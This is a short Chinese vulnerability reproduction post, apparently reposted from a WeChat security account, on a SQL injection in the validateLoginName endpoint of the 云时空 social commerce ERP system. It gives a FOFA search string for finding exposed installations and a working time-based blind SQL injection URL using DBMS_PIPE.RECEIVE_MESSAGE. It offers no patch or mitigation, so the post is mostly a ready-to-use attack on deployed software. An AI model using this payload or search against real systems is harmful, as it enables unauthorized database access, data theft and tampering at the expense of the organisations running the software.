漏洞描述
云时空社会化商业ERP系统validateLoginName存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
资产测绘
FOFA:app="云时空社会化商业ERP系统"
漏洞复现
/sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)--
原文始发于微信公众号(漏洞文库):【漏洞复现】云时空社会化商业ERP系统validateLoginName存在SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论